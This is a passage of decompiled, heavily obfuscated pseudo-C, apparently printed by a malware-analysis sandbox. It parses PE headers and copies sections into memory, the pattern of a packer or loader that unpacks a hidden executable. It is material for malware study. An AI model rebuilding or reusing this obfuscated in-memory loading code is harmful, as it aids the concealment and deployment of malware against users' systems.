					 *_t1442 =  *_t1442 | _t828;
					_t1009 =  *((intOrPtr*)(_t1056 + 0x460024))(_t1056, _v20);
					_push(_t1081);
					 *(_t1056 + 0x45f453) =  *(_t1056 + 0x45f453) & 0x00000000;
					 *(_t1056 + 0x45f453) =  *(_t1056 + 0x45f453) | _t1081 & 0x00000000 ^ _t1009;
					_t828 = _t1009 & 0x00000000 ^  *_t1442;
					_t1442 = _t1442 - 0xfffffffc;
				}
				_t1083 = 0 ^  *_t1442;
				_t1443 =  &(_t1442[1]);
				 *_t212 = _t828;
				_v16 = _v16 + _t1083;
				_push(_v16);
				_pop(_t829);
				_t1352 = _t1350;
				if( *(_t1056 + 0x45f3f3) == 0) {
					 *_t1443 =  *_t1443 ^ _t1223;
					 *_t1443 =  *_t1443 + _t829;
					_t1007 =  *((intOrPtr*)(_t1056 + 0x460024))( *((intOrPtr*)(_t1056 + 0x45fdbe)), _t1223);
					 *_t1443 = _t1422;
					 *(_t1056 + 0x45f3f3) = 0 ^ _t1007;
					_t1422 = 0;
					_pop( *_t220);
					_t829 = (_t1007 & 0x00000000) + _v20;
				}
				_t1291 = _t1288;
				if((_t1083 & 0x00000000 ^ _t1288 & 0x00000000 ^  *(_t1056 + 0x45f686)) > _t829) {
					if( *(_t1056 + 0x45fe74) == 0) {
						_t1006 =  *((intOrPtr*)(_t1056 + 0x460024))(0xffffffff);
						 *_t1443 = _t1291;
						 *(_t1056 + 0x45fe74) = 0 ^ _t1006;
						_t1291 = 0;
					}
					_t226 = _t1056 + 0x45fb7c; // 0x45fb7c
					 *_t1443 =  *_t1443 & 0x00000000;
					 *_t1443 =  *_t1443 + _t226;
					_t227 = _t1056 + 0x45fc78; // 0x45fc78
					 *_t1443 =  *_t1443 & 0x00000000;
					 *_t1443 =  *_t1443 | _t227;
					_t974 =  *((intOrPtr*)(_t1056 + 0x460028))(_t1223, _t1422);
					 *_t1443 =  *_t1443 & 0x00000000;
					 *_t1443 =  *_t1443 | _t974;
					_t229 = _t1056 + 0x45f386; // 0x45f386
					_v20 = 0;
					 *_t1443 =  *_t1443 | _t229;
					_t976 =  *((intOrPtr*)(_t1056 + 0x460028))(_v20, _t1291);
					_t1461 = _t1443 - 0xfffffffc;
					 *_t1461 =  *_t1461 ^ _t1291;
					_t1329 = _t976;
					_t1331 = 0;
					_v12 = _t1329 +  *_t1443;
					_t1186 = 0 ^  *(_t1056 + 0x45f04f);
					_t980 = _v12;
					if(_t1186 > _t980) {
						_t236 = _t1056 + 0x45fc78; // 0x45fc78
						 *_t1461 =  *_t1461 ^ _t1056;
						 *_t1461 =  *_t1461 + _t236;
						_t237 = _t1056 + 0x45f386; // 0x45f386
						_v16 = _v16 & 0x00000000;
						 *_t1461 =  *_t1461 | _t237;
						_t980 =  *((intOrPtr*)(_t1056 + 0x46002c))(_v16, _t1056);
						_v12 = _t1352;
						 *(_t1056 + 0x45fcec) = 0 ^ _t980;
						_t1352 = _v12;
					}
					_pop( *_t245);
					_push(_t1331);
					 *_t1461 =  *_t1461 & 0x00000000;
					 *_t1461 =  *_t1461 + (_t980 & 0x00000000 | _v20);
					_t247 = _t1056 + 0x45f918; // 0x45f918
					_t983 = _t247;
					if( *(_t1056 + 0x45feb7) == 0) {
						 *_t1461 =  *_t1461 ^ _t1352;
						 *_t1461 =  *_t1461 ^ _t983;
						_t1002 =  *((intOrPtr*)(_t1056 + 0x460024))(0xfffffaca, _t1352);
						_push(_t1186);
						 *(_t1056 + 0x45feb7) =  *(_t1056 + 0x45feb7) & 0x00000000;
						 *(_t1056 + 0x45feb7) =  *(_t1056 + 0x45feb7) | _t1186 -  *_t1461 | _t1002;
						_t983 =  *_t1461;
						_t1461 =  &(_t1461[1]);
					}
					 *_t1461 = _t983;
					_t984 =  *((intOrPtr*)(_t1056 + 0x46002c))(_v20);
					_v12 = 0;
					 *_t1461 =  *_t1461 | _t984;
					_t258 = _t1056 + 0x45fb99; // 0x45fb99
					_v12 = _v12 & 0x00000000;
					 *_t1461 =  *_t1461 | _t258;
					_t986 =  *((intOrPtr*)(_t1056 + 0x460028))(_v12, _v12);
					 *_t1461 = _t986;
					_t264 = _t1056 + 0x45f02f; // 0x45f02f
					_v20 = _v20 & 0x00000000;
					 *_t1461 =  *_t1461 ^ _t264;
					_t988 =  *((intOrPtr*)(_t1056 + 0x460028))(_v20, _v20);
					_pop( *_t269);
					_t1188 = _v20;
					 *_t271 = _t988;
					_v20 = _v20 + _t1188;
					_push(_v20);
					_pop(_t989);
					_t1394 = _t1352;
					_v12 = _t1394;
					_t1190 = _t1188 & 0x00000000 ^ (_t1394 & 0x00000000 |  *(_t1056 + 0x45ff3c));
					_t1397 = _v12;
					if(_t1190 > _t989) {
						_t278 = _t1056 + 0x45fb99; // 0x45fb99
						_v16 = 0;
						 *_t1461 =  *_t1461 + _t278;
						_t281 = _t1056 + 0x45f02f; // 0x45f02f
						_v12 = 0;
						 *_t1461 =  *_t1461 ^ _t281;
						_t1001 =  *((intOrPtr*)(_t1056 + 0x46002c))(_v12, _v16);
						_v12 = _t1331;
						 *(_t1056 + 0x45f5e6) =  *(_t1056 + 0x45f5e6) & 0x00000000;
						 *(_t1056 + 0x45f5e6) =  *(_t1056 + 0x45f5e6) ^ _t1331 ^ _v12 ^ _t1001;
						_t1331 = _v12;
					}
					_pop( *_t292);
					_v20 = _t1331;
					 *(_t1056 + 0x45f9c6) =  *(_t1056 + 0x45f9c6) & 0x00000000;
					 *(_t1056 + 0x45f9c6) =  *(_t1056 + 0x45f9c6) | _t1331 - _v20 ^ 0 ^ _v20;
					_t1291 = _v20;
					_t301 = _t1056 + 0x45f3d6; // 0x45f3d6
					 *_t1461 = _t301;
					_t993 =  *((intOrPtr*)(_t1056 + 0x460028))(_v12);
					 *_t1461 =  *_t1461 & 0x00000000;
					 *_t1461 =  *_t1461 | _t993;
					_t304 = _t1056 + 0x45f096; // 0x45f096
					_v12 = _v12 & 0x00000000;
					 *_t1461 =  *_t1461 + _t304;
					_t995 =  *((intOrPtr*)(_t1056 + 0x460028))(_v12, _t1056);
					_t1443 =  &(_t1461[1]);
					 *_t1443 =  *_t1443 | _t1397;
					_t1398 = _t995;
					_t996 = _t1398 + (_t1190 & 0x00000000 |  *_t1461);
					_t1352 = 0;
					_v16 = _t1223;
					_t1223 = _v16;
					if((0 ^  *(_t1056 + 0x45f32c)) > _t996) {
						_t312 = _t1056 + 0x45f3d6; // 0x45f3d6
						 *_t1443 =  *_t1443 - _t1291;
						 *_t1443 =  *_t1443 + _t312;
						_t313 = _t1056 + 0x45f096; // 0x45f096
						 *_t1443 =  *_t1443 - _t1422;
						 *_t1443 = _t313;
						_t996 =  *((intOrPtr*)(_t1056 + 0x46002c))(_t1422, _t1291);
					}
					 *_t1443 = _t1422;
					 *(_t1056 + 0x45fe6c) = 0 ^ _t996;
					_t1422 = 0;
				}
				_t1444 =  &(_t1443[1]);
				 *_t1444 =  *_t1443;
				_t317 = _t1056 + 0x45fbaf; // 0x45fbaf
				 *_t1444 = _t317;
				_t831 =  *((intOrPtr*)(_t1056 + 0x460028))(_v20, _v16);
				 *_t1444 =  *_t1444 - _t1056;
				 *_t1444 =  *_t1444 + _t831;
				_t320 = _t1056 + 0x45f571; // 0x45f571
				 *_t1444 = _t320;
				_t833 =  *((intOrPtr*)(_t1056 + 0x460028))(_v20, _t1056);
				_pop( *_t323);
				_v12 = _t1056;
				_push(_v16 + _t833);
				_t1059 = _v12;
				_pop(_t834);
				_push( *((intOrPtr*)(_t1059 + 0x45fdf9)));
				_pop( *_t328);
				_push(_v12);
				_pop(_t1089);
				if(_t1089 > _t834) {
					 *_t1444 =  *_t1444 ^ _t1223;
					 *_t1444 =  *_t1444 + _t1059 + 0x45fbaf;
					 *_t1444 =  *_t1444 & 0x00000000;
					 *_t1444 =  *_t1444 + _t1059 + 0x45f571;
					_t834 =  *((intOrPtr*)(_t1059 + 0x46002c))(_t1089, _t1223);
					_v16 = _t1089;
					 *(_t1059 + 0x45f870) =  *(_t1059 + 0x45f870) & 0x00000000;
					 *(_t1059 + 0x45f870) =  *(_t1059 + 0x45f870) | _t1089 & 0x00000000 | _t834;
					_t1089 = _v16;
				}
				_t1091 =  *_t1444;
				_t1445 = _t1444 - 0xfffffffc;
				_push(_t1291);
				 *_t1445 =  *_t1445 & 0x00000000;
				 *_t1445 =  *_t1445 + _t1091;
				_v12 = _t1091;
				_t836 = _t834 & 0x00000000 ^ _t1091 ^ _v12 ^ _a4;
				_t1094 = _v12;
				if( *(_t1059 + 0x45f14e) == 0) {
					_v20 = _v20 & 0x00000000;
					 *_t1445 =  *_t1445 ^ _t836;
					 *_t1445 = _t1094;
					_t968 =  *((intOrPtr*)(_t1059 + 0x460024))( *((intOrPtr*)(_t1059 + 0x45f382)), _v16, _v20);
					_v16 = _t1094;
					 *(_t1059 + 0x45f14e) = 0 ^ _t968;
					_t1094 = _v16 & 0x00000000 ^  *_t1445;
					_t1460 =  &(_t1445[1]);
					_t836 = _t968 & 0x00000000 ^  *_t1460;
					_t1445 = _t1460 - 0xfffffffc;
				}
				if( *(_t1059 + 0x45f31c) == 0) {
					if( *(_t1059 + 0x45f341) == 0) {
						 *_t1445 = _t836;
						_v20 = _v20 & 0x00000000;
						 *_t1445 =  *_t1445 ^ _t1094;
						_t966 =  *((intOrPtr*)(_t1059 + 0x460024))( *((intOrPtr*)(_t1059 + 0x45fb59)), _v20, _v16);
						_v12 = _t1223;
						 *(_t1059 + 0x45f341) =  *(_t1059 + 0x45f341) & 0x00000000;
						 *(_t1059 + 0x45f341) =  *(_t1059 + 0x45f341) | _t1223 & 0x00000000 | _t966;
						_t1223 = _v12;
						_t1094 = 0 ^  *_t1445;
						_t1459 =  &(_t1445[1]);
						_t836 =  *_t1459;
						_t1445 =  &(_t1459[1]);
					}
					 *_t1445 =  *_t1445 & 0x00000000;
					 *_t1445 =  *_t1445 ^ _t836;
					 *_t1445 =  *_t1445 - _t836;
					 *_t1445 =  *_t1445 + _t1094;
					 *_t1445 =  *_t1445 & 0x00000000;
					 *_t1445 =  *_t1445 ^ _t1059 + 0x0045f6a5;
					_t939 =  *((intOrPtr*)(_t1059 + 0x460028))(_t1291, _t836, _t1223);
					 *_t1445 = _t939;
					_v12 = 0;
					 *_t1445 =  *_t1445 + _t1059 + 0x45f25a;
					_t941 =  *((intOrPtr*)(_t1059 + 0x460028))(_v12, _v16);
					_pop( *_t374);
					 *_t1445 =  *_t1445 | _t1291;
					_t1324 = _t941;
					_t1326 = 0;
					_v20 = _t1352;
					_t1385 = _v20;
					if((_v20 & 0x00000000 | _t1352 & 0x00000000 |  *(_t1059 + 0x45fc13)) > _t1324 + _v20) {
						_v12 = 0;
						 *_t1445 =  *_t1445 | _t1059 + 0x0045f6a5;
						_v20 = 0;
						 *_t1445 =  *_t1445 + _t1059 + 0x45f25a;
						_push( *((intOrPtr*)(_t1059 + 0x46002c))(_v20, _v12));
						_pop( *_t386);
						_push(_v12);
						_pop( *_t388);
					}
					_pop( *_t389);
					_t1169 = _v20;
					 *_t1445 =  *_t1445 & 0x00000000;
					 *_t1445 =  *_t1445 + _t1169;
					_t943 =  *((intOrPtr*)(_t1059 + 0x460024))(_t1223);
					 *_t1445 =  *_t1445 & 0x00000000;
					 *_t1445 =  *_t1445 ^ _t943;
					_v12 = _v12 & 0x00000000;
					 *_t1445 =  *_t1445 | _t1059 + 0x0045f614;
					_t945 =  *((intOrPtr*)(_t1059 + 0x460028))(_v12, _t1223);
					 *_t1445 =  *_t1445 & 0x00000000;
					 *_t1445 =  *_t1445 | _t945;
					_v20 = _v20 & 0x00000000;
					 *_t1445 =  *_t1445 | _t1059 + 0x0045fb13;
					_t947 =  *((intOrPtr*)(_t1059 + 0x460028))(_v20, _t1169);
					_t1171 = _t1169 & 0x00000000 |  *_t1445;
					_t1458 = _t1445 - 0xfffffffc;
					_v12 = _t1326;
					_push(_t1171 + _t947);
					_t1291 = _v12;
					_pop(_t948);
					_t1173 = _t1171 & 0x00000000 | _t1422 -  *_t1458 ^  *(_t1059 + 0x45f07e);
					_t1422 = _t1422;
					if(_t1173 > _t948) {
						 *_t1458 =  *_t1458 & 0x00000000;
						 *_t1458 =  *_t1458 | _t1059 + 0x0045f614;
						 *_t1458 =  *_t1458 & 0x00000000;
						 *_t1458 =  *_t1458 + _t1059 + 0x45fb13;
						_t948 =  *((intOrPtr*)(_t1059 + 0x46002c))(_t1223, _t1223);
						_v20 = _t1385;
						 *(_t1059 + 0x45f3df) = _t948;
						_t1385 = _v20;
					}
					_t1445 = _t1458 - 0xfffffffc;
					 *(_t1059 + 0x45f31c) =  *(_t1059 + 0x45f31c) & 0x00000000;
					 *(_t1059 + 0x45f31c) =  *(_t1059 + 0x45f31c) ^ _t1385 & 0x00000000 ^ (_t948 & 0x00000000) +  *_t1458;
					_t1388 = _t1385;
					if( *((intOrPtr*)(_t1059 + 0x45fe10)) == 0) {
						 *_t418 =  *((intOrPtr*)(_t1059 + 0x460024))( *((intOrPtr*)(_t1059 + 0x45f80f)));
						_push(_v12);
						_pop( *_t420);
					}
					_pop( *_t421);
					 *_t1445 =  *_t1445 - _t1388;
					 *_t1445 = _v16;
					_v16 = _v16 & 0x00000000;
					 *_t1445 =  *_t1445 + _t1059 + 0x45f3bd;
					_t953 =  *((intOrPtr*)(_t1059 + 0x460028))(_v16, _t1388);
					 *_t1445 = _t953;
					 *_t1445 =  *_t1445 - _t1422;
					 *_t1445 = _t1059 + 0x45fc39;
					_t955 =  *((intOrPtr*)(_t1059 + 0x460028))(_v20);
					 *_t431 = _t1422;
					 *_t1445 =  *_t1445 ^ _t1388;
					_t1389 = _t955;
					_t1352 = 0;
					_push( *((intOrPtr*)(_t1059 + 0x45f846)));
					_pop( *_t434);
					_push(_v12);
					_pop(_t1176);
					if(_t1176 > _t1389 + (_t1173 & 0x00000000) + _v16) {
						 *_t1445 = _t1059 + 0x45f3bd;
						 *_t1445 =  *_t1445 ^ _t1223;
						 *_t1445 = _t1059 + 0x45fc39;
						_push( *((intOrPtr*)(_t1059 + 0x46002c))(_t1223, _v20));
						_pop( *_t440);
						_push(_v20);
						_pop( *_t442);
					}
					_pop( *_t443);
					_t836 = _v12;
				}
				_v12 = _t1291;
				_t837 =  *((intOrPtr*)(_t836 + 0x3c)) + _t836;
				 *_t1445 = _t837;
				 *_t1445 =  *_t1445 & 0x00000000;
				 *_t1445 =  *_t1445 + _t837;
				 *_t1445 =  *_t1445 - _t1059;
				 *_t1445 =  *_t1445 | _t1059 + 0x0045f467;
				_t839 =  *((intOrPtr*)(_t1059 + 0x460028))(_t1059, _t1223, _v16);
				 *_t1445 = _t839;
				_v12 = _v12 & 0x00000000;
				 *_t1445 =  *_t1445 + _t1059 + 0x45f1f8;
				_t841 =  *((intOrPtr*)(_t1059 + 0x460028))(_v12, _v20);
				_pop( *_t457);
				_v16 = _t1223;
				_push(0 + _v16 + _t841);
				_t1226 = _v16;
				_pop(_t842);
				_push( *((intOrPtr*)(_t1059 + 0x45fe28)));
				_pop( *_t462);
				_push(_v20);
				_pop(_t1097);
				if(_t1097 > _t842) {
					_v12 = 0;
					 *_t1445 =  *_t1445 | _t1059 + 0x0045f467;
					_v16 = 0;
					 *_t1445 =  *_t1445 + _t1059 + 0x45f1f8;
					_t937 =  *((intOrPtr*)(_t1059 + 0x46002c))(_v16, _v12);
					_v16 = _t1097;
					 *((intOrPtr*)(_t1059 + 0x45fc82)) = _t937;
					_t1097 = _v16;
				}
				_t1446 =  &(_t1445[1]);
				_v12 = _t1097;
				_t1295 = 0 ^ 0 ^  *_t1445;
				 *_t1446 =  *_t1446 ^ _t1422;
				 *_t1446 =  *_t1446 + _t1059 + 0x45f0bf;
				_t846 =  *((intOrPtr*)(_t1059 + 0x460028))(_t1422);
				 *_t1446 =  *_t1446 ^ _t1352;
				 *_t1446 = _t846;
				 *_t1446 =  *_t1446 & 0x00000000;
				 *_t1446 =  *_t1446 | _t1059 + 0x0045fd28;
				_t848 =  *((intOrPtr*)(_t1059 + 0x460028))(_t1226, _t1352);
				_t1447 = _t1446 - 0xfffffffc;
				 *_t480 = _t848;
				_v16 = _v16 +  *_t1446;
				_push(_v16);
				_pop(_t849);
				_t1061 = _t1059;
				 *_t1447 = _t1226;
				_t1229 = 0;
				if( *((intOrPtr*)(_t1061 + 0x45f194)) > _t849) {
					_t485 = _t1061 + 0x45f0bf; // 0x45f0bf
					 *_t1447 =  *_t1447 & 0x00000000;
					 *_t1447 =  *_t1447 | _t485;
					_t486 = _t1061 + 0x45fd28; // 0x45fd28
					 *_t1447 =  *_t1447 & 0x00000000;
					 *_t1447 =  *_t1447 ^ _t486;
					_t849 =  *((intOrPtr*)(_t1061 + 0x46002c))(_t1295, _t1229);
				}
				 *(_t1061 + 0x45f3c4) =  *(_t1061 + 0x45f3c4) & 0x00000000;
				 *(_t1061 + 0x45f3c4) =  *(_t1061 + 0x45f3c4) | _t1422 ^  *_t1447 ^ _t849;
				_t1425 = _t1422;
				_v16 = _t1229;
				_v8 = _v8 & 0x00000000;
				_v8 = _v8 | _t1229 & 0x00000000 ^  *(_t1295 + 6) & 0x0000ffff;
				_t1232 = _v16;
				_t499 = _t1061 + 0x45f628; // 0x45f628
				 *_t1447 = _t499;
				_t852 =  *((intOrPtr*)(_t1061 + 0x460028))(_v20);
				 *_t1447 = _t852;
				_t503 = _t1061 + 0x45f5bd; // 0x45f5bd
				 *_t1447 =  *_t1447 ^ _t1295;
				 *_t1447 = _t503;
				_t854 =  *((intOrPtr*)(_t1061 + 0x460028))(_v16);
				 *_t505 = _t1295;
				_v20 = _t1061;
				_push(_v12 + _t854);
				_t1064 = _v20;
				_pop(_t855);
				 *_t1447 = _t1352;
				_t1105 =  *((intOrPtr*)(_t1064 + 0x45f053));
				_t1355 = 0;
				if(_t1105 > _t855) {
					 *_t1447 = _t1064 + 0x45f628;
					 *_t1447 =  *_t1447 ^ _t1355;
					 *_t1447 =  *_t1447 | _t1064 + 0x0045f5bd;
					_t855 =  *((intOrPtr*)(_t1064 + 0x46002c))(_t1355, _v16);
				}
				_v12 = _t1105;
				 *((intOrPtr*)(_t1064 + 0x45f0b3)) = _t855;
				_v20 = _v20 & 0x00000000;
				 *_t1447 =  *_t1447 + _t1295;
				_v12 = _v12 & 0x00000000;
				 *_t1447 =  *_t1447 + _t1064 + 0x45f984;
				_t857 =  *((intOrPtr*)(_t1064 + 0x460028))(_v12, _v20);
				 *_t1447 =  *_t1447 - _t1425;
				 *_t1447 =  *_t1447 | _t857;
				_v16 = _v16 & 0x00000000;
				 *_t1447 =  *_t1447 + _t1064 + 0x45f990;
				_t859 =  *((intOrPtr*)(_t1064 + 0x460028))(_v16, _t1425);
				_t1110 = (_v12 & 0x00000000) +  *_t1447;
				_t1448 =  &(_t1447[1]);
				 *_t530 = _t859;
				_v20 = _v20 + _t1110;
				_push(_v20);
				_pop(_t860);
				_t1234 = _t1232;
				_t1112 = _t1110 & 0x00000000 | _t1355 ^  *_t1448 |  *(_t1064 + 0x45f124);
				_t1358 = _t1355;
				if(_t1112 > _t860) {
					 *_t1448 =  *_t1448 & 0x00000000;
					 *_t1448 =  *_t1448 ^ _t1064 + 0x0045f984;
					 *_t1448 =  *_t1448 & 0x00000000;
					 *_t1448 =  *_t1448 ^ _t1064 + 0x0045f990;
					_t860 =  *((intOrPtr*)(_t1064 + 0x46002c))(_t1112, _t1295);
				}
				 *_t538 = _t860;
				_push(_v12);
				_pop( *_t540);
				_t1236 = _t1234 & 0x00000000 ^ _t860 & 0x00000000 ^  *(_t1295 + 0x54);
				_t863 = _t860;
				if( *(_t1064 + 0x45fe60) == 0) {
					_v12 = 0;
					 *_t1448 =  *_t1448 ^ _t1236;
					_t863 =  *((intOrPtr*)(_t1064 + 0x460024))( *((intOrPtr*)(_t1064 + 0x45f87c)), _v12);
					 *(_t1064 + 0x45fe60) =  *(_t1064 + 0x45fe60) & 0x00000000;
					 *(_t1064 + 0x45fe60) =  *(_t1064 + 0x45fe60) ^ (_t1112 & 0x00000000 | _t863);
					 *_t551 = _t1112;
					_t1236 = (_t1236 & 0x00000000) + _v12;
				}
				 *_t1448 = _t863;
				_t1296 = 0 ^  *(_t1064 + 0x45f9b2);
				_t866 = 0;
				_v12 = _t1296;
				_t1360 = _t1358 & 0x00000000 | _t1296 ^ _v12 ^ _a4;
				 *_t1448 =  *_t1448 & 0x00000000;
				 *_t1448 =  *_t1448 + _t1236;
				 *_t1448 = _t1064 + 0x45f30e;
				_t868 =  *((intOrPtr*)(_t1064 + 0x460028))(_v20, _t866);
				_v16 = 0;
				 *_t1448 =  *_t1448 | _t868;
				_v20 = 0;
				 *_t1448 =  *_t1448 ^ _t1064 + 0x0045f813;
				_t870 =  *((intOrPtr*)(_t1064 + 0x460028))(_v20, _v16);
				_t1114 =  *_t1448;
				_t1449 =  &(_t1448[1]);
				 *_t1449 =  *_t1449 ^ _v12;
				_t1300 = _t870;
				_t1302 = 0;
				_v20 = _t1360;
				_t1116 = _t1114 & 0x00000000 | _t1360 - _v20 ^  *(_t1064 + 0x45feaf);
				_t1363 = _v20;
				if(_t1116 > _t1300 + _t1114) {
					_v20 = _v20 & 0x00000000;
					 *_t1449 =  *_t1449 + _t1064 + 0x45f30e;
					 *_t1449 =  *_t1449 ^ _t1064;
					 *_t1449 = _t1064 + 0x45f813;
					_t928 =  *((intOrPtr*)(_t1064 + 0x46002c))(_t1064, _v20);
					 *(_t1064 + 0x45f530) =  *(_t1064 + 0x45f530) & 0x00000000;
					 *(_t1064 + 0x45f530) =  *(_t1064 + 0x45f530) ^ _t1363 & 0x00000000 ^ _t928;
					_t1363 = _t1363;
				}
				_t1238 = (_t1236 & 0x00000000) +  *_t1449;
				_t1450 =  &(_t1449[1]);
				_v12 = _t1302;
				_t1118 = _t1116 & 0x00000000 | _t1302 & 0x00000000 ^ _t1238;
				_t1305 = _v12;
				if( *((intOrPtr*)(_t1064 + 0x45f86c)) == 0) {
					 *_t1450 = _t1118;
					 *_t1450 =  *_t1450 - _t1064;
					 *_t1450 =  *_t1450 | _t1238;
					_push( *((intOrPtr*)(_t1064 + 0x460024))(_t1064, _v12));
					_pop( *_t586);
					_push(_v20);
					_pop( *_t588);
					_t1238 =  *_t1450;
					_t1450 = _t1450 - 0xfffffffc;
					 *_t589 = 1;
					_t1118 = _v20;
				}
				if(_t1305 == _t1363) {
					L85:
					_t1307 = _t1305 & 0x00000000 |  *_t1450;
					_t1451 = _t1450 - 0xfffffffc;
					_t715 = _t1064 + 0x45fa88; // 0x45fa88
					_v16 = _v16 & 0x00000000;
					 *_t1451 =  *_t1451 + _t715;
					_t873 =  *((intOrPtr*)(_t1064 + 0x460028))(_v16);
					 *_t1451 =  *_t1451 - _t1307;
					 *_t1451 = _t873;
					_t720 = _t1064 + 0x45f6b2; // 0x45f6b2
					 *_t1451 =  *_t1451 - _t1238;
					 *_t1451 = _t720;
					_t875 =  *((intOrPtr*)(_t1064 + 0x460028))(_t1238, _t1307);
					_t1452 = _t1451 + 4;
					 *_t1452 =  *_t1452 + _t1425;
					_t1426 = _t875;
					_t876 = _t1426 +  *_t1451;
					_t1428 = 0;
					 *_t1452 = _t1363;
					_t1121 =  *((intOrPtr*)(_t1064 + 0x45fc5a));
					_t1366 = 0;
					if(_t1121 > _t876) {
						_t723 = _t1064 + 0x45fa88; // 0x45fa88
						_v20 = _v20 & 0x00000000;
						 *_t1452 =  *_t1452 | _t723;
						_t727 = _t1064 + 0x45f6b2; // 0x45f6b2
						 *_t1452 = _t727;
						_t876 =  *((intOrPtr*)(_t1064 + 0x46002c))(_v12, _v20);
					}
					 *_t730 = _t876;
					_push(_v16);
					_pop( *_t732);
					_push(_t1121);
					_t1308 = _t1307 + 0xf8;
					do {
						_push(_t1366);
						 *_t1452 =  *_t1452 & 0x00000000;
						 *_t1452 =  *_t1452 + _t1308;
						if( *(_t1064 + 0x45f534) == 0) {
							_t876 =  *((intOrPtr*)(_t1064 + 0x460024))(0);
							 *(_t1064 + 0x45f534) =  *(_t1064 + 0x45f534) & 0x00000000;
							 *(_t1064 + 0x45f534) =  *(_t1064 + 0x45f534) ^ _t1308 ^  *_t1452 ^ _t876;
							_t1308 = _t1308;
						}
						 *_t1452 = _t1308;
						_t1367 = _a4;
						_t1311 = 0;
						if( *(_t1064 + 0x45f59f) == 0) {
							_t876 =  *((intOrPtr*)(_t1064 + 0x460024))( *((intOrPtr*)(_t1064 + 0x45f914)));
							 *_t1452 = _t1428;
							 *(_t1064 + 0x45f59f) = _t876;
							_t1428 = 0;
						}
						_v12 = _t1367;
						_t1125 = 0 ^  *(_t1311 + 0x10);
						_v12 = _t876;
						_push( *((intOrPtr*)(_t1311 + 0x14)) + _v12);
						_t879 = _v12;
						_pop(_t1371);
						if( *(_t1064 + 0x45f9f5) == 0) {
							 *_t1452 =  *_t1452 & 0x00000000;
							 *_t1452 =  *_t1452 ^ _t1125;
							_v20 = 0;
							 *_t1452 =  *_t1452 + _t1371;
							_t891 =  *((intOrPtr*)(_t1064 + 0x460024))(_v20, _t879);
							_v12 = _t1238;
							 *(_t1064 + 0x45f9f5) =  *(_t1064 + 0x45f9f5) & 0x00000000;
							 *(_t1064 + 0x45f9f5) =  *(_t1064 + 0x45f9f5) ^ (_t1238 & 0x00000000 | _t891);
							_t1238 = _v12;
							_pop( *_t760);
							_t1125 = (_t1125 & 0x00000000) + _v20;
						}
						_v20 = _t1125;
						_push( *(_t1064 + 0x45f9b2) +  *((intOrPtr*)(_t1311 + 0xc)));
						_t1128 = _v20;
						_pop(_t1313);
						_v20 = _v20 & 0x00000000;
						 *_t1452 =  *_t1452 | _t1128;
						 *_t1452 =  *_t1452 & 0x00000000;
						 *_t1452 =  *_t1452 ^ _t1064 + 0x0045f128;
						_t881 =  *((intOrPtr*)(_t1064 + 0x460028))(_t1428, _v20);
						 *_t1452 =  *_t1452 ^ _t1313;
						 *_t1452 =  *_t1452 ^ _t881;
						 *_t1452 =  *_t1452 - _t1428;
						 *_t1452 =  *_t1452 | _t1064 + 0x0045f972;
						_t883 =  *((intOrPtr*)(_t1064 + 0x460028))(_t1428, _t1313);
						_t1130 = (_t1128 & 0x00000000) +  *_t1452;
						_t1453 = _t1452 - 0xfffffffc;
						_v12 = _t1064;
						_push(_t1130 + _t883);
						_t1064 = _v12;
						_pop(_t884);
						_t1366 = _t1371;
						if((_t1130 & 0x00000000 ^ (_t1371 ^  *_t1453 |  *(_t1064 + 0x45f94a))) > _t884) {
							 *_t1453 =  *_t1453 - _t1064;
							 *_t1453 =  *_t1453 | _t1064 + 0x0045f128;
							 *_t1453 = _t1064 + 0x45f972;
							_push( *((intOrPtr*)(_t1064 + 0x46002c))(_v16, _t1064));
							_pop( *_t780);
							_push(_v16);
							_pop( *_t782);
						}
						_t876 = memcpy(_t1313, _t1366,  *_t1453);
						_t1452 = _t1453 - 0xfffffffc + 0xc;
						_pop( *_t783);
						_t1308 =  &_a36;
						_t1428 = _t1428;
						_t785 =  &_v8;
						 *_t785 = _v8 - 1;
					} while ( *_t785 != 0);
					_pop( *_t787);
					_t1317 = _v16;
					 *_t790 =  *((intOrPtr*)(_v16 + 0x28));
					_push(_v20);
					_v16 = 0;
					_push( *(_t1064 + 0x45f9b2) + _t885);
					_t1138 = _v16;
					_pop(_t886);
					 *(_t1064 + 0x45fdd9) =  *(_t1064 + 0x45fdd9) & 0x00000000;
					 *(_t1064 + 0x45fdd9) =  *(_t1064 + 0x45fdd9) | _t1138 -  *_t1452 | _t886;
					_t1141 = _t1138;
					 *_t800 =  *(_t1064 + 0x45f9b2);
					_push(_v20);
					_pop(_t1374);
					if(_t1374 > 0) {
						 *_t1452 =  *_t1452 ^ _t1238;
						 *_t1452 =  *_t1452 ^ _t1374; // executed
						_t887 = E00B34CC2(_t1064, _t1141, _t1317, _t1374, _t1238); // executed
						_v12 = _v12 & 0x00000000;
						 *_t1452 =  *_t1452 + _t1374;
						_t886 = E00B34A05(_t887, _t1064, _t1238, _t1317, _t1374, _v12);
					}
					_pop( *_t805);
					_pop( *_t807);
					return _t886;
				} else {
					if( *(_t1064 + 0x45f30a) == 0) {
						_v16 = 0;
						 *_t1450 =  *_t1450 | _t1118;
						_v12 = _v12 & 0x00000000;
						 *_t1450 =  *_t1450 | _t1238;
						_t924 =  *((intOrPtr*)(_t1064 + 0x460024))( *((intOrPtr*)(_t1064 + 0x45f583)), _v12, _v16);
						_v12 = _t1238;
						 *(_t1064 + 0x45f30a) =  *(_t1064 + 0x45f30a) & 0x00000000;
						 *(_t1064 + 0x45f30a) =  *(_t1064 + 0x45f30a) ^ _t1238 & 0x00000000 ^ _t924;
						_pop( *_t605);
						_t1238 = (_v12 & 0x00000000) + _v20;
						_t1118 =  *_t1450;
						_t1450 = _t1450 - 0xfffffffc;
					}
					do {
						asm("movsb");
						_t1118 = _t1118 - 1;
					} while (_t1118 != 0);
					_v20 = _v20 & 0x00000000;
					 *_t1450 =  *_t1450 ^ _t1238;
					 *_t1450 =  *_t1450 & 0x00000000;
					 *_t1450 =  *_t1450 + _t1064 + 0x45f60e;
					_t895 =  *((intOrPtr*)(_t1064 + 0x460028))(_t1425, _v20);
					_v16 = 0;
					 *_t1450 =  *_t1450 ^ _t895;
					 *_t1450 =  *_t1450 & 0x00000000;
					 *_t1450 =  *_t1450 + _t1064 + 0x45f244;
					_t897 =  *((intOrPtr*)(_t1064 + 0x460028))(_t1425, _v16);
					_t1145 =  *_t1450;
					_t1456 = _t1450 - 0xfffffffc;
					 *_t616 = _t897;
					_v20 = _v20 + _t1145;
					_push(_v20);
					_pop(_t898);
					_t1376 = _t1363;
